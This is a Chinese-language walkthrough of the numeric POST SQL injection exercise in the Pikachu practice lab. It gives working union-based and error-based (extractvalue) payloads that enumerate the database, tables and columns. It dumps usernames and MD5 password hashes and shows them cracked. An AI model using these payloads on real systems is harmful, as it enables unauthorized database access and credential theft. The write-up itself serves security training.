pikachu靶场-SQLI-数字型注入(POST)
- 请求方式— POST
- 包裹方式— id=1
- 注入类型— 联合、报错、布尔盲注、延时
下面演示一下联合注入和报错注入by hand
联合注入
首先查列:
id=1 order by 1#&submit=%E6%9F%A5%E8%AF%A2
回显正常
id=1 order by 2#&submit=%E6%9F%A5%E8%AF%A2
回显正常
id=1 order by 3#&submit=%E6%9F%A5%E8%AF%A2
回显:
Unknown column '3' in 'order clause'
列数:2
查库:
id=-1 union select 1,database()#&submit=%E6%9F%A5%E8%AF%A2
回显:
hello,1
your email is: pikachu
库名为pikachu
查表:
id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu'#&submit=%E6%9F%A5%E8%AF%A2
回显:
hello,1
your email is: httpinfo,member,message,users,xssblind
表名为httpinfo,member,message,users,xssblind
查列:
id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users' #&submit=%E6%9F%A5%E8%AF%A2
回显:
hello,1
your email is:id,username,password,level
列名为id,username,password,level
查字段:
id=-1 union select group_concat(username),group_concat(paswoord) from users#&submit=%E6%9F%A5%E8%AF%A2
id=-1 union select group_concat(username),group_concat(level) from users#&submit=%E6%9F%A5%E8%AF%A2
回显:
hello,admin,pikachu,test
your email is: e10adc3949ba59abbe56e057f20f883e,670b14728ad9902aecba32e22fa4f6bd,e99a18c428cb38d5f260853678922e03
hello,admin,pikachu,test
your email is: 1,2,3
对密码进行md5解密:
e10adc3949ba59abbe56e057f20f883e — 123456
670b14728ad9902aecba32e22fa4f6bd — 000000
e99a18c428cb38d5f260853678922e03 — abc123
用户名:
admin,pikachu,test
密码:
123456,000000,abc123
level:
1,2,3
报错注入
查库:
id=-1 and extractvalue(1,concat(0x7e,(select database())))#&submit=%E6%9F%A5%E8%AF%A2
回显:
XPATH syntax error: '~pikachu'
查表:
id=-1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='pikachu')))#&submit=%E6%9F%A5%E8%AF%A2
回显:
XPATH syntax error: '~httpinfo,member,message,users,x'
报错信息有32字节的限制
如果显示里没有需要的表名,再用limit来查
查列:
id=-1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users')))#&submit=%E6%9F%A5%E8%AF%A2
回显:
XPATH syntax error: '~id,username,password,level'
查字段:
id=-1 and extractvalue(1,concat(0x7e,(select username from users limit 0,1)))#&submit=%E6%9F%A5%E8%AF%A2
回显:
XPATH syntax error: '~admin'
limit 1,1
回显:
XPATH syntax error: '~pikachu'
limit 2,1
回显:
XPATH syntax error: '~test'
limit 3,1
回显:
您输入的user id不存在
字段只有3个
接着查password:
id=-1 and extractvalue(1,concat(0x7e,(select password from users limit 0,1)))#&submit=%E6%9F%A5%E8%AF%A2
回显:
XPATH syntax error: '~e10adc3949ba59abbe56e057f20f883'
limit 1,1
回显:
XPATH syntax error: '~670b14728ad9902aecba32e22fa4f6b'
limit 2,1
回显:
XPATH syntax error: '~e99a18c428cb38d5f260853678922e0'
解码:
对密码进行md5解密:
e10adc3949ba59abbe56e057f20f883e — 123456
670b14728ad9902aecba32e22fa4f6bd — 000000
e99a18c428cb38d5f260853678922e03 — abc123
用户名:
admin,pikachu,test
密码:
123456,000000,abc123
如果对level字段有需求可以接着查,和查username和password字段的步骤一样^^